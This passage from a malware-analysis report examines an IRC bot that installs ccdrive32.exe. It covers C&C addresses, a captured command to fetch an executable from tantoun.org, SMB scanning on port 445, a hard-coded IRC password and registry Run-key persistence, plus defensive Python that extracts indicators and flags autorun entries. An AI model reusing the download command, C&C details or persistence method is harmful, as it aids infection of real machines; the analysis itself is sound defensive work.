204.45.6.194

Remote Host      Port Number
112.78.112.208   80
218.5.74.190     80
204.45.6.194     47221

* The following ports were open in the system, all owned by the dropped binary (2088 through 2184 inclusive is a run of 97 consecutive ports):

Port(s)       Protocol   Process
1055          TCP        ccdrive32.exe (%Windir%\ccdrive32.exe)
1058          TCP        ccdrive32.exe (%Windir%\ccdrive32.exe)
1059          TCP        ccdrive32.exe (%Windir%\ccdrive32.exe)
2088 - 2184   TCP        ccdrive32.exe (%Windir%\ccdrive32.exe)

A single process holding a long run of adjacent high TCP ports is consistent with the client sockets of a multi-threaded scanner rather than with listening services; it fits the 25-thread scans of TCP 445 that the bot reports over IRC later in this report. When triaging a live host, treat such a run as a scanner footprint and check the owning process rather than expecting a service behind each port.

* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi

Both are public "proxy judge" CGI scripts, which echo the requesting client's IP address and request headers back to it. The bot calls them to learn its own external IP address, which matches the "Trying to get external IP" status line in the IRC traffic below.

* The following IRC traffic was captured (client and server lines as logged):

PRIVMSG #i :HTTP SET http://tantoun.org/odBF.exe
PRIVMSG [N00_USA_XP_5631
@ :scan// Trying to get external IP.
@ :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
NICK [N00_USA_XP_5631253]
@ :scan// Sequential Port Scan started on 192.168.207.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
MODE ##xddc -ix
MODE #xddc1 -ix
MODE #xddc2 -ix
USER SP2-201 * 0 :COMPUTERNAME
MODE [N00_USA_XP_5631253]
@ -ix

The bot registers with a nick of the form [N00_USA_XP_<number>], which appears to encode country and OS version, and a USER line whose real-name field is the infected machine's computer name. It sets modes on the channels ##xddc, #xddc1 and #xddc2 and reports its activity as "scan//" status lines: after looking up its external IP it runs random and sequential scans of TCP port 445 (SMB) across private 192.x.x.x ranges using 25 threads with a 5 second delay. The PRIVMSG to #i carries an HTTP SET command with the URL http://tantoun.org/odBF.exe, an instruction to fetch a further executable, so that host name is worth blocking and hunting for in proxy logs alongside the C&C address.

* Outbound traffic on port 47221 (the connection to 204.45.6.194 listed above) carried the IRC server login:

00000000 | 5041 5353 206C 6574 6D65 696E 0D0A 4A4F | PASS letmein..JO
00000010 | 4A4F 2023 762C 234D 6120 6F6F 6F6F 0D0A | JO #v,#Ma oooo..
00000020 | 4A4F 4A4F 2023 762C 234D 6120 6F6F 6F6F | JOJO #v,#Ma oooo
00000030 | 0D0A | ..

Decoded, the stream is "PASS letmein\r\n" followed by "JOJO #v,#Ma oooo\r\n" sent twice. The bot authenticates to the C&C server with the hard-coded server password letmein and then sends a non-standard verb, JOJO, with the channel list #v,#Ma and a second parameter oooo; in standard IRC that position is a JOIN with channel keys, so the server side is presumably customised. The password, the channel names and the verb itself are all usable as network detection strings for this family.
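The login bytes and the IRC lines above are easy to decode by hand, but a responder usually wants them pulled into indicators automatically. The following Python is an added example, not part of the original report: it rebuilds the raw bytes from the hexdump's hex column, parses each IRC-style line into command and parameters, and extracts the server password, nick, channels, download URL and scan targets. The hexdump and IRC lines are transcribed from this page; the parsing logic and the field names (server_password, scan_targets and so on) are my own, and the generic parser also copes with the non-standard JOJO verb and the prefix-less "@ :scan//" status lines exactly as they appear in the log.

```python
"""Turn the captured IRC login (hexdump) and the quoted IRC lines into
indicators. Added example; the samples are transcribed from the report,
the parsing code and field names are not from the original analysis."""
import re

# Hexdump of the outbound traffic on port 47221, transcribed from the report.
HEXDUMP = """\
00000000 | 5041 5353 206C 6574 6D65 696E 0D0A 4A4F | PASS letmein..JO
00000010 | 4A4F 2023 762C 234D 6120 6F6F 6F6F 0D0A | JO #v,#Ma oooo..
00000020 | 4A4F 4A4F 2023 762C 234D 6120 6F6F 6F6F | JOJO #v,#Ma oooo
00000030 | 0D0A | ..
"""

# Plaintext IRC lines quoted in the report (the truncated PRIVMSG is left out).
IRC_LINES = """\
PRIVMSG #i :HTTP SET http://tantoun.org/odBF.exe
@ :scan// Trying to get external IP.
@ :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
NICK [N00_USA_XP_5631253]
MODE ##xddc -ix
USER SP2-201 * 0 :COMPUTERNAME
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
SCAN_RE = re.compile(r"Port Scan started on (\S+?):(\d+) .*?using (\d+) threads")


def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild raw bytes from 'offset | hex words | ascii' lines.
    Only the hex column is used; the ASCII column is lossy ('.' for
    non-printables) and is ignored."""
    out = bytearray()
    for line in dump.splitlines():
        cols = line.split("|")
        if len(cols) >= 2:
            out += bytes.fromhex(cols[1].replace(" ", ""))
    return bytes(out)


def parse_irc_line(line: str):
    """Split one IRC line into (prefix, command, params). The trailing
    parameter after ' :' may contain spaces, so it is cut off first."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    words = head.split()
    command = words[0].upper() if words else ""
    params = words[1:]
    if sep:
        params.append(trailing)
    return prefix, command, params


def extract_indicators(login: bytes, irc_text: str) -> dict:
    """Collect the C&C indicators a responder would block or hunt for."""
    ind = {"server_password": None, "nick": None, "channels": set(),
           "download_urls": [], "scan_targets": [], "status": []}
    lines = [raw.decode("latin-1") for raw in login.split(b"\r\n") if raw]
    lines += [l for l in irc_text.splitlines() if l.strip()]
    for line in lines:
        _, cmd, params = parse_irc_line(line)
        if cmd == "PASS" and params:
            ind["server_password"] = params[0]
        elif cmd == "NICK" and params:
            ind["nick"] = params[0]
        for p in params:
            # channel lists are comma separated ("#v,#Ma"); keys and modes are separate params
            ind["channels"].update(t for t in p.split(",") if t.startswith("#"))
            ind["download_urls"] += URL_RE.findall(p)
            ind["scan_targets"] += [(host, int(port), int(threads))
                                    for host, port, threads in SCAN_RE.findall(p)]
            if p.startswith("scan//"):
                ind["status"].append(p)
    return ind


if __name__ == "__main__":
    result = extract_indicators(hexdump_to_bytes(HEXDUMP), IRC_LINES)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Only the hex column of the dump is trusted when rebuilding the bytes, because the ASCII column renders CR/LF as dots and would lose the line structure the IRC parser depends on.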

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Driver Setup = "%Windir%\ccdrive32.exe"
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Microsoft Driver Setup = "%Windir%\ccdrive32.exe"

so that ccdrive32.exe runs every time Windows starts. The value name "Microsoft Driver Setup" is chosen to look legitimate, and the same entry is written under two autorun keys: the well-known ...\CurrentVersion\Run and the policies\Explorer\Run key, which is the registry location behind the "Run these programs at user logon" group policy and is less commonly inspected. Both values must be removed together, otherwise the binary is restarted at the next logon from whichever key was missed.
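Taken together, the per-process port table earlier in this report and the two autorun values above give a host-side triage signature. The following Python is an added example rather than part of the report: it parses rows in the report's "Port Protocol Process" shape and flags any process holding a long run of consecutive TCP ports (the client-socket footprint of a threaded scanner), and it parses a .reg-style export of the two Run keys and flags the persistence traits seen here. The port rows reproduce the report's entries plus two benign rows I constructed for contrast, the .reg text is constructed from the values listed above, and the thresholds and heuristics (run length of 20, the policy key, an .exe directly in %Windir%, a value name reused across Run keys) are mine.

```python
"""Host-side triage of the artifacts in this report: the per-process port
table and the autorun registry values. Added example; inputs are constructed
to match the report's entries, not copied from sandbox output."""
import re
from collections import defaultdict

# Rows in the report's "Port Protocol Process" shape: the entries attributed
# to ccdrive32.exe plus two benign rows (constructed) for contrast.
PORT_ROWS = (
    "135 TCP svchost.exe (%Windir%\\System32\\svchost.exe)\n"
    "445 TCP System (System)\n"
    "1055 TCP ccdrive32.exe (%Windir%\\ccdrive32.exe)\n"
    "1058 TCP ccdrive32.exe (%Windir%\\ccdrive32.exe)\n"
    "1059 TCP ccdrive32.exe (%Windir%\\ccdrive32.exe)\n"
    + "".join(f"{p} TCP ccdrive32.exe (%Windir%\\ccdrive32.exe)\n"
              for p in range(2088, 2185))
)

# Constructed .reg-style export of the two Run keys from the report, plus a
# benign ctfmon entry (a common legitimate Run value on XP).
REG_EXPORT = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Driver Setup"="%Windir%\\ccdrive32.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"Microsoft Driver Setup"="%Windir%\\ccdrive32.exe"
"""

AUTORUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run",
)
PORT_ROW_RE = re.compile(r"^(\d+)\s+(TCP|UDP)\s+(\S+)\s+\((.*)\)$")
REG_KEY_RE = re.compile(r"^\[(.+)\]$")
REG_VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')
# An .exe sitting directly in the Windows directory (not a subfolder such as System32).
WINDIR_ROOT_EXE_RE = re.compile(r"(?i)^(%windir%|c:\\windows)\\[^\\]+\.exe$")


def consecutive_port_runs(rows: str, min_len: int = 20):
    """Return (process, first_port, last_port) for each run of at least
    min_len adjacent TCP ports held by one process. A threaded scanner's
    outbound sockets show up as such a run; servers rarely bind ~100
    adjacent ports."""
    by_proc = defaultdict(list)
    for line in rows.splitlines():
        m = PORT_ROW_RE.match(line.strip())
        if m and m.group(2) == "TCP":
            by_proc[m.group(3)].append(int(m.group(1)))
    runs = []
    for proc, ports in by_proc.items():
        ports = sorted(set(ports))
        start = prev = ports[0]
        for p in ports[1:] + [None]:          # None terminates the last run
            if p is None or p != prev + 1:
                if prev - start + 1 >= min_len:
                    runs.append((proc, start, prev))
                start = p
            prev = p
    return runs


def parse_reg_export(text: str) -> dict:
    """Parse the subset of .reg syntax used above into {key: {name: data}},
    unescaping the doubled backslashes .reg files use in string data."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if (m := REG_KEY_RE.match(line)):
            current = m.group(1)
            keys.setdefault(current, {})
        elif current and (m := REG_VALUE_RE.match(line)):
            keys[current][m.group(1)] = m.group(2).replace("\\\\", "\\")
    return keys


def autorun_findings(keys: dict):
    """Flag autorun values that sit under the policy Run key, point at an
    executable dropped straight into %Windir%, or reuse one value name in
    more than one Run key (the traits of the persistence in this report)."""
    findings, seen = [], defaultdict(list)
    for key in AUTORUN_KEYS:
        for name, data in keys.get(key, {}).items():
            seen[name].append(key)
            if key.lower().endswith(r"policies\explorer\run"):
                findings.append((name, "policy Run key used for persistence"))
            if WINDIR_ROOT_EXE_RE.match(data):
                findings.append((name, "executable dropped directly in %Windir%"))
    for name, where in seen.items():
        if len(where) > 1:
            findings.append((name, f"same value name in {len(where)} Run keys"))
    return findings


if __name__ == "__main__":
    print(consecutive_port_runs(PORT_ROWS))
    for finding in autorun_findings(parse_reg_export(REG_EXPORT)):
        print(finding)
```

On a live host the same two functions can be fed the output of netstat -anob and of reg export for the two keys; the run-length threshold of 20 is deliberately conservative so that a handful of adjacent ephemeral ports from a normal client does not trigger it.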

Memory Modifications

* There was a new process created in the system:

Process Name     Process Filename          Main Module Size
ccdrive32.exe    %Windir%\ccdrive32.exe    339 968 bytes
